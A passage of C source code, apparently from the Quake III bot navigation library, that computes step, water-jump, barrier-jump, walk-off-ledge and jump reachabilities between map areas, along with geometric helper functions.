x1 = DotProduct(v1, ort) / ortdot;
x2 = DotProduct(v2, ort) / ortdot;
x3 = DotProduct(v3, ort) / ortdot;
x4 = DotProduct(v4, ort) / ortdot;
//
if (x1 > x2)
{
tmp = x1; x1 = x2; x2 = tmp;
tmp = y1; y1 = y2; y2 = tmp;
VectorCopy(v1, tmpv); VectorCopy(v2, v1); VectorCopy(tmpv, v2);
} //end if
if (x3 > x4)
{
tmp = x3; x3 = x4; x4 = tmp;
tmp = y3; y3 = y4; y4 = tmp;
VectorCopy(v3, tmpv); VectorCopy(v4, v3); VectorCopy(tmpv, v4);
} //end if
//if the two projected edge lines have no overlap
if (x2 <= x3 || x4 <= x1)
{
// Log_Write("lines no overlap: from area %d to %d\r\n", area1num, area2num);
continue;
} //end if
//if the two lines fully overlap
if ((x1 - 0.5 < x3 && x4 < x2 + 0.5) &&
(x3 - 0.5 < x1 && x2 < x4 + 0.5))
{
dist1 = y3 - y1;
dist2 = y4 - y2;
VectorCopy(v1, p1area1);
VectorCopy(v2, p2area1);
VectorCopy(v3, p1area2);
VectorCopy(v4, p2area2);
} //end if
else
{
//if the points are equal
if (x1 > x3 - 0.1 && x1 < x3 + 0.1)
{
dist1 = y3 - y1;
VectorCopy(v1, p1area1);
VectorCopy(v3, p1area2);
} //end if
else if (x1 < x3)
{
y = y1 + (x3 - x1) * (y2 - y1) / (x2 - x1);
dist1 = y3 - y;
VectorCopy(v3, p1area1);
p1area1[2] = y;
VectorCopy(v3, p1area2);
} //end if
else
{
y = y3 + (x1 - x3) * (y4 - y3) / (x4 - x3);
dist1 = y - y1;
VectorCopy(v1, p1area1);
VectorCopy(v1, p1area2);
p1area2[2] = y;
} //end if
//if the points are equal
if (x2 > x4 - 0.1 && x2 < x4 + 0.1)
{
dist2 = y4 - y2;
VectorCopy(v2, p2area1);
VectorCopy(v4, p2area2);
} //end if
else if (x2 < x4)
{
y = y3 + (x2 - x3) * (y4 - y3) / (x4 - x3);
dist2 = y - y2;
VectorCopy(v2, p2area1);
VectorCopy(v2, p2area2);
p2area2[2] = y;
} //end if
else
{
y = y1 + (x4 - x1) * (y2 - y1) / (x2 - x1);
dist2 = y4 - y;
VectorCopy(v4, p2area1);
p2area1[2] = y;
VectorCopy(v4, p2area2);
} //end else
} //end else
//if both distances are pretty much equal
//then we take the middle of the points
if (dist1 > dist2 - 1 && dist1 < dist2 + 1)
{
dist = dist1;
VectorAdd(p1area1, p2area1, start);
VectorScale(start, 0.5, start);
VectorAdd(p1area2, p2area2, end);
VectorScale(end, 0.5, end);
} //end if
else if (dist1 < dist2)
{
dist = dist1;
VectorCopy(p1area1, start);
VectorCopy(p1area2, end);
} //end else if
else
{
dist = dist2;
VectorCopy(p2area1, start);
VectorCopy(p2area2, end);
} //end else
//get the length of the overlapping part of the edges of the two areas
VectorSubtract(p2area2, p1area2, dir);
length = VectorLength(dir);
//
if (groundface1->faceflags & FACE_GROUND)
{
//if the vertical distance is smaller
if (dist < ground_bestdist ||
//or the vertical distance is pretty much the same
//but the overlapping part of the edges is longer
(dist < ground_bestdist + 1 && length > ground_bestlength))
{
ground_bestdist = dist;
ground_bestlength = length;
ground_foundreach = qtrue;
ground_bestarea2groundedgenum = edge1num;
//best point towards area1
VectorCopy(start, ground_beststart);
//normal is pointing into area2
VectorCopy(normal, ground_bestnormal);
//best point towards area2
VectorCopy(end, ground_bestend);
} //end if
} //end if
else
{
//if the vertical distance is smaller
if (dist < water_bestdist ||
//or the vertical distance is pretty much the same
//but the overlapping part of the edges is longer
(dist < water_bestdist + 1 && length > water_bestlength))
{
water_bestdist = dist;
water_bestlength = length;
water_foundreach = qtrue;
water_bestarea2groundedgenum = edge1num;
//best point towards area1
VectorCopy(start, water_beststart);
//normal is pointing into area2
VectorCopy(normal, water_bestnormal);
//best point towards area2
VectorCopy(end, water_bestend);
} //end if
} //end else
} //end for
} //end for
} //end for
} //end for
//
// NOTE: swim reachabilities are already filtered out
//
// Steps
//
// ---------
// | step height -> TRAVEL_WALK
//--------|
//
// ---------
//~~~~~~~~| step height and low water -> TRAVEL_WALK
//--------|
//
//~~~~~~~~~~~~~~~~~~
// ---------
// | step height and low water up to the step -> TRAVEL_WALK
//--------|
//
//check for a step reachability
if (ground_foundreach)
{
//if area2 is higher but lower than the maximum step height
//NOTE: ground_bestdist >= 0 also catches equal floor reachabilities
if (ground_bestdist >= 0 && ground_bestdist < aassettings.phys_maxstep)
{
//create walk reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = ground_bestarea2groundedgenum;
VectorMA(ground_beststart, INSIDEUNITS_WALKSTART, ground_bestnormal, lreach->start);
VectorMA(ground_bestend, INSIDEUNITS_WALKEND, ground_bestnormal, lreach->end);
lreach->traveltype = TRAVEL_WALK;
lreach->traveltime = 0;//1;
//if going into a crouch area
if (!AAS_AreaCrouch(area1num) && AAS_AreaCrouch(area2num))
{
lreach->traveltime += aassettings.rs_startcrouch;
} //end if
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//NOTE: if there's nearby solid or a gap area after this area
/*
if (!AAS_NearbySolidOrGap(lreach->start, lreach->end))
{
lreach->traveltime += 100;
} //end if
*/
//avoid rather small areas
//if (AAS_AreaGroundFaceArea(lreach->areanum) < 500) lreach->traveltime += 100;
//
reach_step++;
return qtrue;
} //end if
} //end if
//
// Water Jumps
//
// ---------
// |
//~~~~~~~~|
// |
// | higher than step height and water up to waterjump height -> TRAVEL_WATERJUMP
//--------|
//
//~~~~~~~~~~~~~~~~~~
// ---------
// |
// |
// |
// | higher than step height and low water up to the step -> TRAVEL_WATERJUMP
//--------|
//
//check for a waterjump reachability
if (water_foundreach)
{
//get a test point a little bit towards area1
VectorMA(water_bestend, -INSIDEUNITS, water_bestnormal, testpoint);
//go down the maximum waterjump height
testpoint[2] -= aassettings.phys_maxwaterjump;
//if there IS water the sv_maxwaterjump height below the bestend point
if (aasworld.areasettings[AAS_PointAreaNum(testpoint)].areaflags & AREA_LIQUID)
{
//don't create rediculous water jump reachabilities from areas very far below
//the water surface
if (water_bestdist < aassettings.phys_maxwaterjump + 24)
{
//waterjumping from or towards a crouch only area is not possible in Quake2
if ((aasworld.areasettings[area1num].presencetype & PRESENCE_NORMAL) &&
(aasworld.areasettings[area2num].presencetype & PRESENCE_NORMAL))
{
//create water jump reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = water_bestarea2groundedgenum;
VectorCopy(water_beststart, lreach->start);
VectorMA(water_bestend, INSIDEUNITS_WATERJUMP, water_bestnormal, lreach->end);
lreach->traveltype = TRAVEL_WATERJUMP;
lreach->traveltime = aassettings.rs_waterjump;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//we've got another waterjump reachability
reach_waterjump++;
return qtrue;
} //end if
} //end if
} //end if
} //end if
//
// Barrier Jumps
//
// ---------
// |
// |
// |
// | higher than step height lower than barrier height -> TRAVEL_BARRIERJUMP
//--------|
//
// ---------
// |
// |
// |
//~~~~~~~~| higher than step height lower than barrier height
//--------| and a thin layer of water in the area to jump from -> TRAVEL_BARRIERJUMP
//
//check for a barrier jump reachability
if (ground_foundreach)
{
//if area2 is higher but lower than the maximum barrier jump height
if (ground_bestdist > 0 && ground_bestdist < aassettings.phys_maxbarrier)
{
//if no water in area1 or a very thin layer of water on the ground
if (!water_foundreach || (ground_bestdist - water_bestdist < 16))
{
//cannot perform a barrier jump towards or from a crouch area in Quake2
if (!AAS_AreaCrouch(area1num) && !AAS_AreaCrouch(area2num))
{
//create barrier jump reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = ground_bestarea2groundedgenum;
VectorMA(ground_beststart, INSIDEUNITS_WALKSTART, ground_bestnormal, lreach->start);
VectorMA(ground_bestend, INSIDEUNITS_WALKEND, ground_bestnormal, lreach->end);
lreach->traveltype = TRAVEL_BARRIERJUMP;
lreach->traveltime = aassettings.rs_barrierjump;//AAS_BarrierJumpTravelTime();
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//we've got another barrierjump reachability
reach_barrier++;
return qtrue;
} //end if
} //end if
} //end if
} //end if
//
// Walk and Walk Off Ledge
//
//--------|
// | can walk or step back -> TRAVEL_WALK
// ---------
//
//--------|
// |
// |
// |
// | cannot walk/step back -> TRAVEL_WALKOFFLEDGE
// ---------
//
//--------|
// |
// |~~~~~~~~
// |
// | cannot step back but can waterjump back -> TRAVEL_WALKOFFLEDGE
// --------- FIXME: create TRAVEL_WALK reach??
//
//check for a walk or walk off ledge reachability
if (ground_foundreach)
{
if (ground_bestdist < 0)
{
if (ground_bestdist > -aassettings.phys_maxstep)
{
//create walk reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = ground_bestarea2groundedgenum;
VectorMA(ground_beststart, INSIDEUNITS_WALKSTART, ground_bestnormal, lreach->start);
VectorMA(ground_bestend, INSIDEUNITS_WALKEND, ground_bestnormal, lreach->end);
lreach->traveltype = TRAVEL_WALK;
lreach->traveltime = 1;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//we've got another walk reachability
reach_walk++;
return qtrue;
} //end if
// if no maximum fall height set or less than the max
if (!aassettings.rs_maxfallheight || fabs(ground_bestdist) < aassettings.rs_maxfallheight) {
//trace a bounding box vertically to check for solids
VectorMA(ground_bestend, INSIDEUNITS, ground_bestnormal, ground_bestend);
VectorCopy(ground_bestend, start);
start[2] = ground_beststart[2];
VectorCopy(ground_bestend, end);
end[2] += 4;
trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
//if no solids were found
if (!trace.startsolid && trace.fraction >= 1.0)
{
//the trace end point must be in the goal area
trace.endpos[2] += 1;
if (AAS_PointAreaNum(trace.endpos) == area2num)
{
//if not going through a cluster portal
numareas = AAS_TraceAreas(start, end, areas, NULL, ARRAY_LEN(areas));
for (i = 0; i < numareas; i++)
if (AAS_AreaClusterPortal(areas[i]))
break;
if (i >= numareas)
{
//create a walk off ledge reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = ground_bestarea2groundedgenum;
VectorCopy(ground_beststart, lreach->start);
VectorCopy(ground_bestend, lreach->end);
lreach->traveltype = TRAVEL_WALKOFFLEDGE;
lreach->traveltime = aassettings.rs_startwalkoffledge + fabs(ground_bestdist) * 50 / aassettings.phys_gravity;
//if falling from too high and not falling into water
if (!AAS_AreaSwim(area2num) && !AAS_AreaJumpPad(area2num))
{
if (AAS_FallDelta(ground_bestdist) > aassettings.phys_falldelta5)
{
lreach->traveltime += aassettings.rs_falldamage5;
} //end if
if (AAS_FallDelta(ground_bestdist) > aassettings.phys_falldelta10)
{
lreach->traveltime += aassettings.rs_falldamage10;
} //end if
} //end if
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_walkoffledge++;
//NOTE: don't create a weapon (rl, bfg) jump reachability here
//because it interferes with other reachabilities
//like the ladder reachability
return qtrue;
} //end if
} //end if
} //end if
} //end if
} //end else
} //end if
return qfalse;
} //end of the function AAS_Reachability_Step_Barrier_WaterJump_WalkOffLedge
//===========================================================================
// returns the distance between the two vectors
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
float VectorDistance(vec3_t v1, vec3_t v2)
{
vec3_t dir;
VectorSubtract(v2, v1, dir);
return VectorLength(dir);
} //end of the function VectorDistance
//===========================================================================
// returns true if the first vector is between the last two vectors
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int VectorBetweenVectors(vec3_t v, vec3_t v1, vec3_t v2)
{
vec3_t dir1, dir2;
VectorSubtract(v, v1, dir1);
VectorSubtract(v, v2, dir2);
return (DotProduct(dir1, dir2) <= 0);
} //end of the function VectorBetweenVectors
//===========================================================================
// returns the mid point between the two vectors
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void VectorMiddle(vec3_t v1, vec3_t v2, vec3_t middle)
{
VectorAdd(v1, v2, middle);
VectorScale(middle, 0.5, middle);
} //end of the function VectorMiddle
//===========================================================================
// calculate a range of points closest to each other on both edges
//
// Parameter: beststart1 start of the range of points on edge v1-v2
// beststart2 end of the range of points on edge v1-v2
// bestend1 start of the range of points on edge v3-v4
// bestend2 end of the range of points on edge v3-v4
// bestdist best distance so far
// Returns: -
// Changes Globals: -
//===========================================================================
/*
float AAS_ClosestEdgePoints(vec3_t v1, vec3_t v2, vec3_t v3, vec3_t v4,
aas_plane_t *plane1, aas_plane_t *plane2,
vec3_t beststart, vec3_t bestend, float bestdist)
{
vec3_t dir1, dir2, p1, p2, p3, p4;
float a1, a2, b1, b2, dist;
int founddist;
//edge vectors
VectorSubtract(v2, v1, dir1);
VectorSubtract(v4, v3, dir2);
//get the horizontal directions
dir1[2] = 0;
dir2[2] = 0;
//
// p1 = point on an edge vector of area2 closest to v1
// p2 = point on an edge vector of area2 closest to v2
// p3 = point on an edge vector of area1 closest to v3
// p4 = point on an edge vector of area1 closest to v4
//
if (dir2[0])
{
a2 = dir2[1] / dir2[0];
b2 = v3[1] - a2 * v3[0];
//point on the edge vector of area2 closest to v1
p1[0] = (DotProduct(v1, dir2) - (a2 * dir2[0] + b2 * dir2[1])) / dir2[0];
p1[1] = a2 * p1[0] + b2;
//point on the edge vector of area2 closest to v2
p2[0] = (DotProduct(v2, dir2) - (a2 * dir2[0] + b2 * dir2[1])) / dir2[0];
p2[1] = a2 * p2[0] + b2;
} //end if
else
{
//point on the edge vector of area2 closest to v1
p1[0] = v3[0];
p1[1] = v1[1];
//point on the edge vector of area2 closest to v2
p2[0] = v3[0];
p2[1] = v2[1];
} //end else
//
if (dir1[0])
{
//
a1 = dir1[1] / dir1[0];
b1 = v1[1] - a1 * v1[0];
//point on the edge vector of area1 closest to v3
p3[0] = (DotProduct(v3, dir1) - (a1 * dir1[0] + b1 * dir1[1])) / dir1[0];
p3[1] = a1 * p3[0] + b1;
//point on the edge vector of area1 closest to v4
p4[0] = (DotProduct(v4, dir1) - (a1 * dir1[0] + b1 * dir1[1])) / dir1[0];
p4[1] = a1 * p4[0] + b1;
} //end if
else
{
//point on the edge vector of area1 closest to v3
p3[0] = v1[0];
p3[1] = v3[1];
//point on the edge vector of area1 closest to v4
p4[0] = v1[0];
p4[1] = v4[1];
} //end else
//start with zero z-coordinates
p1[2] = 0;
p2[2] = 0;
p3[2] = 0;
p4[2] = 0;
//calculate the z-coordinates from the ground planes
p1[2] = (plane2->dist - DotProduct(plane2->normal, p1)) / plane2->normal[2];
p2[2] = (plane2->dist - DotProduct(plane2->normal, p2)) / plane2->normal[2];
p3[2] = (plane1->dist - DotProduct(plane1->normal, p3)) / plane1->normal[2];
p4[2] = (plane1->dist - DotProduct(plane1->normal, p4)) / plane1->normal[2];
//
founddist = qfalse;
//
if (VectorBetweenVectors(p1, v3, v4))
{
dist = VectorDistance(v1, p1);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
VectorMiddle(beststart, v1, beststart);
VectorMiddle(bestend, p1, bestend);
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v1, beststart);
VectorCopy(p1, bestend);
} //end if
founddist = qtrue;
} //end if
if (VectorBetweenVectors(p2, v3, v4))
{
dist = VectorDistance(v2, p2);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
VectorMiddle(beststart, v2, beststart);
VectorMiddle(bestend, p2, bestend);
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v2, beststart);
VectorCopy(p2, bestend);
} //end if
founddist = qtrue;
} //end else if
if (VectorBetweenVectors(p3, v1, v2))
{
dist = VectorDistance(v3, p3);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
VectorMiddle(beststart, p3, beststart);
VectorMiddle(bestend, v3, bestend);
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(p3, beststart);
VectorCopy(v3, bestend);
} //end if
founddist = qtrue;
} //end else if
if (VectorBetweenVectors(p4, v1, v2))
{
dist = VectorDistance(v4, p4);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
VectorMiddle(beststart, p4, beststart);
VectorMiddle(bestend, v4, bestend);
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(p4, beststart);
VectorCopy(v4, bestend);
} //end if
founddist = qtrue;
} //end else if
//if no shortest distance was found the shortest distance
//is between one of the vertexes of edge1 and one of edge2
if (!founddist)
{
dist = VectorDistance(v1, v3);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v1, beststart);
VectorCopy(v3, bestend);
} //end if
dist = VectorDistance(v1, v4);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v1, beststart);
VectorCopy(v4, bestend);
} //end if
dist = VectorDistance(v2, v3);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v2, beststart);
VectorCopy(v3, bestend);
} //end if
dist = VectorDistance(v2, v4);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v2, beststart);
VectorCopy(v4, bestend);
} //end if
} //end if
return bestdist;
} //end of the function AAS_ClosestEdgePoints*/
float AAS_ClosestEdgePoints(vec3_t v1, vec3_t v2, vec3_t v3, vec3_t v4,
aas_plane_t *plane1, aas_plane_t *plane2,
vec3_t beststart1, vec3_t bestend1,
vec3_t beststart2, vec3_t bestend2, float bestdist)
{
vec3_t dir1, dir2, p1, p2, p3, p4;
float a1, a2, b1, b2, dist, dist1, dist2;
int founddist;
//edge vectors
VectorSubtract(v2, v1, dir1);
VectorSubtract(v4, v3, dir2);
//get the horizontal directions
dir1[2] = 0;
dir2[2] = 0;
//
// p1 = point on an edge vector of area2 closest to v1
// p2 = point on an edge vector of area2 closest to v2
// p3 = point on an edge vector of area1 closest to v3
// p4 = point on an edge vector of area1 closest to v4
//
if (dir2[0])
{
a2 = dir2[1] / dir2[0];
b2 = v3[1] - a2 * v3[0];
//point on the edge vector of area2 closest to v1
p1[0] = (DotProduct(v1, dir2) - (a2 * dir2[0] + b2 * dir2[1])) / dir2[0];
p1[1] = a2 * p1[0] + b2;
//point on the edge vector of area2 closest to v2
p2[0] = (DotProduct(v2, dir2) - (a2 * dir2[0] + b2 * dir2[1])) / dir2[0];
p2[1] = a2 * p2[0] + b2;
} //end if
else
{
//point on the edge vector of area2 closest to v1
p1[0] = v3[0];
p1[1] = v1[1];
//point on the edge vector of area2 closest to v2
p2[0] = v3[0];
p2[1] = v2[1];
} //end else
//
if (dir1[0])
{
//
a1 = dir1[1] / dir1[0];
b1 = v1[1] - a1 * v1[0];
//point on the edge vector of area1 closest to v3
p3[0] = (DotProduct(v3, dir1) - (a1 * dir1[0] + b1 * dir1[1])) / dir1[0];
p3[1] = a1 * p3[0] + b1;
//point on the edge vector of area1 closest to v4
p4[0] = (DotProduct(v4, dir1) - (a1 * dir1[0] + b1 * dir1[1])) / dir1[0];
p4[1] = a1 * p4[0] + b1;
} //end if
else
{
//point on the edge vector of area1 closest to v3
p3[0] = v1[0];
p3[1] = v3[1];
//point on the edge vector of area1 closest to v4
p4[0] = v1[0];
p4[1] = v4[1];
} //end else
//start with zero z-coordinates
p1[2] = 0;
p2[2] = 0;
p3[2] = 0;
p4[2] = 0;
//calculate the z-coordinates from the ground planes
p1[2] = (plane2->dist - DotProduct(plane2->normal, p1)) / plane2->normal[2];
p2[2] = (plane2->dist - DotProduct(plane2->normal, p2)) / plane2->normal[2];
p3[2] = (plane1->dist - DotProduct(plane1->normal, p3)) / plane1->normal[2];
p4[2] = (plane1->dist - DotProduct(plane1->normal, p4)) / plane1->normal[2];
//
founddist = qfalse;
//
if (VectorBetweenVectors(p1, v3, v4))
{
dist = VectorDistance(v1, p1);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
dist1 = VectorDistance(beststart1, v1);
dist2 = VectorDistance(beststart2, v1);
if (dist1 > dist2)
{
if (dist1 > VectorDistance(beststart1, beststart2)) VectorCopy(v1, beststart2);
} //end if
else
{
if (dist2 > VectorDistance(beststart1, beststart2)) VectorCopy(v1, beststart1);
} //end else
dist1 = VectorDistance(bestend1, p1);
dist2 = VectorDistance(bestend2, p1);
if (dist1 > dist2)
{
if (dist1 > VectorDistance(bestend1, bestend2)) VectorCopy(p1, bestend2);
} //end if
else
{
if (dist2 > VectorDistance(bestend1, bestend2)) VectorCopy(p1, bestend1);
} //end else
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v1, beststart1);
VectorCopy(v1, beststart2);
VectorCopy(p1, bestend1);
VectorCopy(p1, bestend2);
} //end if
founddist = qtrue;
} //end if
if (VectorBetweenVectors(p2, v3, v4))
{
dist = VectorDistance(v2, p2);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
dist1 = VectorDistance(beststart1, v2);
dist2 = VectorDistance(beststart2, v2);
if (dist1 > dist2)
{
if (dist1 > VectorDistance(beststart1, beststart2)) VectorCopy(v2, beststart2);
} //end if
else
{
if (dist2 > VectorDistance(beststart1, beststart2)) VectorCopy(v2, beststart1);
} //end else
dist1 = VectorDistance(bestend1, p2);
dist2 = VectorDistance(bestend2, p2);
if (dist1 > dist2)
{
if (dist1 > VectorDistance(bestend1, bestend2)) VectorCopy(p2, bestend2);
} //end if
else
{
if (dist2 > VectorDistance(bestend1, bestend2)) VectorCopy(p2, bestend1);
} //end else
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v2, beststart1);
VectorCopy(v2, beststart2);
VectorCopy(p2, bestend1);
VectorCopy(p2, bestend2);
} //end if
founddist = qtrue;
} //end else if
if (VectorBetweenVectors(p3, v1, v2))
{
dist = VectorDistance(v3, p3);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
dist1 = VectorDistance(beststart1, p3);
dist2 = VectorDistance(beststart2, p3);
if (dist1 > dist2)
{
if (dist1 > VectorDistance(beststart1, beststart2)) VectorCopy(p3, beststart2);
} //end if
else
{
if (dist2 > VectorDistance(beststart1, beststart2)) VectorCopy(p3, beststart1);
} //end else
dist1 = VectorDistance(bestend1, v3);
dist2 = VectorDistance(bestend2, v3);
if (dist1 > dist2)
{
if (dist1 > VectorDistance(bestend1, bestend2)) VectorCopy(v3, bestend2);
} //end if
else
{
if (dist2 > VectorDistance(bestend1, bestend2)) VectorCopy(v3, bestend1);
} //end else
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(p3, beststart1);
VectorCopy(p3, beststart2);
VectorCopy(v3, bestend1);
VectorCopy(v3, bestend2);
} //end if
founddist = qtrue;
} //end else if
if (VectorBetweenVectors(p4, v1, v2))
{
dist = VectorDistance(v4, p4);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
dist1 = VectorDistance(beststart1, p4);
dist2 = VectorDistance(beststart2, p4);
if (dist1 > dist2)
{
if (dist1 > VectorDistance(beststart1, beststart2)) VectorCopy(p4, beststart2);
} //end if
else
{
if (dist2 > VectorDistance(beststart1, beststart2)) VectorCopy(p4, beststart1);
} //end else
dist1 = VectorDistance(bestend1, v4);
dist2 = VectorDistance(bestend2, v4);
if (dist1 > dist2)
{
if (dist1 > VectorDistance(bestend1, bestend2)) VectorCopy(v4, bestend2);
} //end if
else
{
if (dist2 > VectorDistance(bestend1, bestend2)) VectorCopy(v4, bestend1);
} //end else
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(p4, beststart1);
VectorCopy(p4, beststart2);
VectorCopy(v4, bestend1);
VectorCopy(v4, bestend2);
} //end if
founddist = qtrue;
} //end else if
//if no shortest distance was found the shortest distance
//is between one of the vertexes of edge1 and one of edge2
if (!founddist)
{
dist = VectorDistance(v1, v3);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v1, beststart1);
VectorCopy(v1, beststart2);
VectorCopy(v3, bestend1);
VectorCopy(v3, bestend2);
} //end if
dist = VectorDistance(v1, v4);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v1, beststart1);
VectorCopy(v1, beststart2);
VectorCopy(v4, bestend1);
VectorCopy(v4, bestend2);
} //end if
dist = VectorDistance(v2, v3);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v2, beststart1);
VectorCopy(v2, beststart2);
VectorCopy(v3, bestend1);
VectorCopy(v3, bestend2);
} //end if
dist = VectorDistance(v2, v4);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v2, beststart1);
VectorCopy(v2, beststart2);
VectorCopy(v4, bestend1);
VectorCopy(v4, bestend2);
} //end if
} //end if
return bestdist;
} //end of the function AAS_ClosestEdgePoints
//===========================================================================
// creates possible jump reachabilities between the areas
//
// The two closest points on the ground of the areas are calculated
// One of the points will be on an edge of a ground face of area1 and
// one on an edge of a ground face of area2.
// If there is a range of closest points the point in the middle of this range
// is selected.
// Between these two points there must be one or more gaps.
// If the gaps exist a potential jump is predicted.
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_Jump(int area1num, int area2num)
{
int i, j, k, l, face1num, face2num, edge1num, edge2num, traveltype;
int stopevent, areas[10], numareas;
float phys_jumpvel, maxjumpdistance, maxjumpheight, height, bestdist, speed;
float *v1, *v2, *v3, *v4;
vec3_t beststart, beststart2, bestend, bestend2;
vec3_t teststart, testend, dir, velocity, cmdmove, up = {0, 0, 1}, sidewards;
aas_area_t *area1, *area2;
aas_face_t *face1, *face2;
aas_edge_t *edge1, *edge2;
aas_plane_t *plane1, *plane2, *plane;
aas_trace_t trace;
aas_clientmove_t move;
aas_lreachability_t *lreach;
if (!AAS_AreaGrounded(area1num) || !AAS_AreaGrounded(area2num)) return qfalse;
//cannot jump from or to a crouch area
if (AAS_AreaCrouch(area1num) || AAS_AreaCrouch(area2num)) return qfalse;
//
area1 = &aasworld.areas[area1num];
area2 = &aasworld.areas[area2num];
//
phys_jumpvel = aassettings.phys_jumpvel;
//maximum distance a player can jump
maxjumpdistance = 2 * AAS_MaxJumpDistance(phys_jumpvel);
//maximum height a player can jump with the given initial z velocity
maxjumpheight = AAS_MaxJumpHeight(phys_jumpvel);
//if the areas are not near anough in the x-y direction
for (i = 0; i < 2; i++)
{
if (area1->mins[i] > area2->maxs[i] + maxjumpdistance) return qfalse;
if (area1->maxs[i] < area2->mins[i] - maxjumpdistance) return qfalse;
} //end for
//if area2 is way to high to jump up to
if (area2->mins[2] > area1->maxs[2] + maxjumpheight) return qfalse;
//
bestdist = 999999;
//
for (i = 0; i < area1->numfaces; i++)
{
face1num = aasworld.faceindex[area1->firstface + i];
face1 = &aasworld.faces[abs(face1num)];
//if not a ground face
if (!(face1->faceflags & FACE_GROUND)) continue;
//
for (j = 0; j < area2->numfaces; j++)
{
face2num = aasworld.faceindex[area2->firstface + j];
face2 = &aasworld.faces[abs(face2num)];
//if not a ground face
if (!(face2->faceflags & FACE_GROUND)) continue;
//
for (k = 0; k < face1->numedges; k++)
{
edge1num = abs(aasworld.edgeindex[face1->firstedge + k]);
edge1 = &aasworld.edges[edge1num];
for (l = 0; l < face2->numedges; l++)
{
edge2num = abs(aasworld.edgeindex[face2->firstedge + l]);
edge2 = &aasworld.edges[edge2num];
//calculate the minimum distance between the two edges
v1 = aasworld.vertexes[edge1->v[0]];
v2 = aasworld.vertexes[edge1->v[1]];
v3 = aasworld.vertexes[edge2->v[0]];
v4 = aasworld.vertexes[edge2->v[1]];
//get the ground planes
plane1 = &aasworld.planes[face1->planenum];
plane2 = &aasworld.planes[face2->planenum];
//
bestdist = AAS_ClosestEdgePoints(v1, v2, v3, v4, plane1, plane2,
beststart, bestend,
beststart2, bestend2, bestdist);
} //end for
} //end for
} //end for
} //end for
VectorMiddle(beststart, beststart2, beststart);
VectorMiddle(bestend, bestend2, bestend);
if (bestdist > 4 && bestdist < maxjumpdistance)
{
// Log_Write("shortest distance between %d and %d is %f\r\n", area1num, area2num, bestdist);
// if very close and almost no height difference then the bot can walk
if (bestdist <= 48 && fabs(beststart[2] - bestend[2]) < 8)
{
speed = 400;
traveltype = TRAVEL_WALKOFFLEDGE;
} //end if
else if (AAS_HorizontalVelocityForJump(0, beststart, bestend, &speed))
{
//FIXME: why multiply with 1.2???
speed *= 1.2f;
traveltype = TRAVEL_WALKOFFLEDGE;
} //end else if
else
{
//get the horizontal speed for the jump, if it isn't possible to calculate this
//speed (the jump is not possible) then there's no jump reachability created
if (!AAS_HorizontalVelocityForJump(phys_jumpvel, beststart, bestend, &speed))
return qfalse;
speed *= 1.05f;
traveltype = TRAVEL_JUMP;
//
//NOTE: test if the horizontal distance isn't too small
VectorSubtract(bestend, beststart, dir);
dir[2] = 0;
if (VectorLength(dir) < 10)
return qfalse;
} //end if
//
VectorSubtract(bestend, beststart, dir);
VectorNormalize(dir);
VectorMA(beststart, 1, dir, teststart);
//
VectorCopy(teststart, testend);
testend[2] -= 100;
trace = AAS_TraceClientBBox(teststart, testend, PRESENCE_NORMAL, -1);
//
if (trace.startsolid)
return qfalse;
if (trace.fraction < 1)
{
plane = &aasworld.planes[trace.planenum];
// if the bot can stand on the surface
if (DotProduct(plane->normal, up) >= 0.7)
{
// if no lava or slime below
if (!(AAS_PointContents(trace.endpos) & (CONTENTS_LAVA|CONTENTS_SLIME)))
{
if (teststart[2] - trace.endpos[2] <= aassettings.phys_maxbarrier)
return qfalse;
} //end if
} //end if
} //end if
//
VectorMA(bestend, -1, dir, teststart);
//
VectorCopy(teststart, testend);
testend[2] -= 100;
trace = AAS_TraceClientBBox(teststart, testend, PRESENCE_NORMAL, -1);
//
if (trace.startsolid)
